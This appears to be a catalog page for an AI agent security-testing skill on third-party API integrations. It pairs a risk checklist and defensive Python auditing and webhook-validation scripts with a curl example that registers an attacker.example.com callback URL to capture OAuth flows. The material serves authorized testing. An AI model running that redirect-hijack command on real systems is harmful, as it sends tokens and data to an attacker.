# Third-Party Connector Security
Api Security Agent skill (138 lines)

Third-party API integration risk assessment and supply chain security testing

## Quick Summary
You are a third-party integration security analyst who evaluates the risk of external API dependencies, OAuth integrations, and supply chain connections during authorized security assessments. You understand that every third-party connector extends your attack surface, inherits the vendor's vulnerabilities, and creates trust relationships that persist long after the integration is forgotten.
## Key Points
- **You inherit their vulnerabilities** — a breach at any third-party provider is a breach of your system if credentials, data, or trust relationships are shared.
- **Least privilege applies to integrations** — third-party connectors should have the minimum permissions required, scoped to specific resources, with time-bounded access.
- **Inventory is security** — you cannot protect integrations you do not know about; shadow integrations and abandoned OAuth grants are persistent backdoors.
- **Data flows cross trust boundaries** — every piece of data sent to or received from a third party must be validated, sanitized, and accounted for.
1. **Inventory all third-party integrations and their access levels**:
2. **Audit third-party OAuth scopes for over-permission**:
3. **Test for credential exposure in integration configs**:
4. **Test third-party callback/redirect URI validation**:
5. **Test data leakage through third-party error responses**:
6. **Check for abandoned or stale integrations**:
7. **Test third-party webhook payload injection**:
8. **Test for TOCTOU in token refresh flows**:
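Steps 1, 2, 4 and 6 above (inventory, scope audit, callback validation, stale integrations) can be run as one automated check over the inventory JSON that the Quick Example pulls with `curl` and `jq`. The script below is an added example, not code from the skill itself. It assumes each inventory record carries the `name`, `scopes` and `created_at` fields the skill's `jq` projection shows, plus assumed `last_used_at` and `callback_url` fields; the per-vendor callback allowlist, the sample inventory and the scope-name heuristic are all constructed for the demonstration:

```python
"""Audit a third-party integration inventory for over-permission, staleness
and callback URLs that are not on the registered allowlist (added example)."""
from datetime import datetime, timedelta
from urllib.parse import urlparse

# Substrings that indicate write/admin/delete capability in a scope name.
# Assumption: vendors name scopes differently, so this is a review heuristic.
HIGH_RISK_MARKERS = ("write", "admin", "delete")

# Callback hostnames the organisation registered per vendor (constructed allowlist).
CALLBACK_ALLOWLIST = {
    "slack": {"hooks.slack.com"},
    "github": {"api.github.com"},
}

# Constructed sample inventory, not real data; field names follow the skill's
# jq projection plus the assumed last_used_at and callback_url fields.
SAMPLE_INVENTORY = [
    {"name": "slack", "scopes": ["chat:write", "channels:read"],
     "created_at": "2024-01-10T00:00:00Z", "last_used_at": "2024-08-15T00:00:00Z",
     "callback_url": "https://hooks.slack.com/services/T000/B000/example"},
    {"name": "github", "scopes": ["repo", "admin", "delete_repo"],
     "created_at": "2021-03-01T00:00:00Z", "last_used_at": "2021-04-01T00:00:00Z",
     "callback_url": "https://api.github.com.evil-example.test/capture"},
    {"name": "jira", "scopes": ["read:jira-work"],
     "created_at": "2024-08-20T00:00:00Z", "last_used_at": None,
     "callback_url": "http://jira.internal.example/cb"},
]


def parse_ts(value):
    """Parse an ISO-8601 UTC timestamp such as 2024-01-10T00:00:00Z (None stays None)."""
    if value is None:
        return None
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def is_high_risk_scope(scope):
    """True for a wildcard scope or any scope name carrying a write/admin/delete marker."""
    s = scope.lower()
    return s == "*" or any(marker in s for marker in HIGH_RISK_MARKERS)


def callback_is_allowed(vendor, url):
    """Strict callback check: https only, no embedded credentials, exact host match.
    Exact matching (not prefix or suffix) defeats hosts like api.github.com.evil-example.test."""
    parts = urlparse(url)
    if parts.scheme != "https" or parts.username or parts.password:
        return False
    return parts.hostname in CALLBACK_ALLOWLIST.get(vendor, set())


def audit(inventory, now, stale_days=90):
    """Return (name, issue, detail) findings for each integration in the inventory."""
    findings = []
    cutoff = now - timedelta(days=stale_days)
    for item in inventory:
        name = item["name"]
        risky = [s for s in item["scopes"] if is_high_risk_scope(s)]
        if risky:
            findings.append((name, "high_risk_scope", ",".join(risky)))
        # An integration never used since creation is judged by its creation date.
        last = parse_ts(item.get("last_used_at")) or parse_ts(item["created_at"])
        if last < cutoff:
            findings.append((name, "stale", last.date().isoformat()))
        if not callback_is_allowed(name, item["callback_url"]):
            findings.append((name, "callback_not_allowlisted", item["callback_url"]))
    return findings


def summarize(findings):
    """Count findings per issue type, e.g. {'stale': 1, ...}."""
    counts = {}
    for _, issue, _ in findings:
        counts[issue] = counts.get(issue, 0) + 1
    return counts


if __name__ == "__main__":
    for finding in audit(SAMPLE_INVENTORY, parse_ts("2024-09-01T00:00:00Z")):
        print(finding)
```

Run against the sample inventory, the script flags the GitHub connector three times (admin and delete scopes, no use in over three years, and a look-alike callback host), which is exactly the combination of over-permission, abandonment and callback weakness the checklist is looking for. Feed it the real `/api/integrations` JSON and adjust the allowlist and scope markers to the vendors in use.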
## Quick Example
```bash
# Check what scopes each integration has
curl -s -H "Authorization: Bearer $TOKEN" \
https://target.example.com/api/integrations | \
jq '.[] | {name: .name, scopes: .scopes, created: .created_at}'
# Flag integrations with write/admin/delete scopes
```
```bash
# Register malicious redirect URIs in integration settings
curl -X PUT https://target.example.com/api/integrations/slack \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"callback_url": "https://attacker.example.com/capture"}'
```

Full skill: 138 lines. Fetch it with `skilldb get api-security-agent-skills/third-party-connectors`, or install it directly with `skilldb add api-security-agent-skills`.
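For step 7 of the checklist (webhook payload injection), the defensive counterpart to the tests above is a receiver that checks the vendor's HMAC signature over the raw body before parsing anything, and then validates the payload against an explicit key and type allowlist rather than trusting whatever fields arrive. This is an added example, not part of the skill; the shared secret, the hypothetical `order.updated` event schema and the sample bodies are all constructed:

```python
"""Webhook receiver hardening: signature first, then strict payload validation
(added example with a constructed secret and schema)."""
import hashlib
import hmac
import json

# Shared secret agreed with the vendor out of band (constructed placeholder).
WEBHOOK_SECRET = b"constructed-example-secret"

# Exact key set and type the handler accepts for the assumed order.updated event.
EXPECTED_SCHEMA = {"event": str, "order_id": str, "amount_cents": int}

# Constructed sample bodies: one legitimate, one with an injected extra field.
GOOD_BODY = json.dumps(
    {"event": "order.updated", "order_id": "o-123", "amount_cents": 4200}).encode()
INJECTED_BODY = json.dumps(
    {"event": "order.updated", "order_id": "o-123", "amount_cents": 4200,
     "role": "admin"}).encode()


def sign(body, secret=WEBHOOK_SECRET):
    """HMAC-SHA256 over the raw request body, hex-encoded, as the sender computes it."""
    return hmac.new(secret, body, hashlib.sha256).hexdigest()


def verify_signature(body, provided_sig, secret=WEBHOOK_SECRET):
    """Constant-time comparison so a wrong signature does not leak timing information."""
    return hmac.compare_digest(sign(body, secret), provided_sig or "")


def validate_payload(body):
    """Parse the JSON and enforce the allowlist: exact key set, expected types,
    supported event name and sane values. Returns (ok, error_message)."""
    try:
        data = json.loads(body)
    except ValueError:
        return False, "malformed JSON"
    if not isinstance(data, dict):
        return False, "top-level value must be an object"
    if set(data) != set(EXPECTED_SCHEMA):
        return False, f"unexpected key set: {sorted(data)}"
    for key, typ in EXPECTED_SCHEMA.items():
        value = data[key]
        # bool is a subclass of int in Python, so reject it explicitly for int fields.
        if not isinstance(value, typ) or isinstance(value, bool):
            return False, f"field {key!r} has wrong type"
    if data["event"] != "order.updated":
        return False, "unsupported event type"
    if data["amount_cents"] < 0:
        return False, "negative amount"
    return True, ""


def handle_webhook(body, provided_sig):
    """Reject unsigned or tampered bodies before parsing; then schema-validate.
    Returns (http_status, reason)."""
    if not verify_signature(body, provided_sig):
        return 401, "bad signature"
    ok, err = validate_payload(body)
    if not ok:
        return 400, err
    return 200, "accepted"


if __name__ == "__main__":
    print(handle_webhook(GOOD_BODY, sign(GOOD_BODY)))
    print(handle_webhook(INJECTED_BODY, sign(INJECTED_BODY)))
    print(handle_webhook(GOOD_BODY, "not-the-signature"))
```

The ordering matters: verifying the signature over the raw bytes before `json.loads` means malformed or oversized bodies from anyone who does not hold the secret never reach the parser, and the exact key-set check is what turns an injected field such as `role` into a 400 instead of a silently accepted attribute.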
## Related Skills
- **API Authentication Flow Testing**: OAuth2, API key, and HMAC authentication flow testing for security assessments (Api Security Agent, 139 lines)
- **Rate Limit Testing**: Rate limiting bypass testing, throttle evasion, and abuse prevention assessment (Api Security Agent, 146 lines)
- **API Schema Validation Testing**: API schema validation testing, fuzzing, and type confusion attacks (Api Security Agent, 155 lines)
- **Token Handling Security**: JWT/OAuth token analysis, validation, and expiry testing for API security assessments (Api Security Agent, 126 lines)
- **Webhook Security Testing**: Webhook trust boundary testing, signature verification, and callback security (Api Security Agent, 146 lines)
- **App Sideload Abuse Detection**: Detect app sideload abuse, marketplace scams, and unauthorized application distribution (Brand Protection, 48 lines)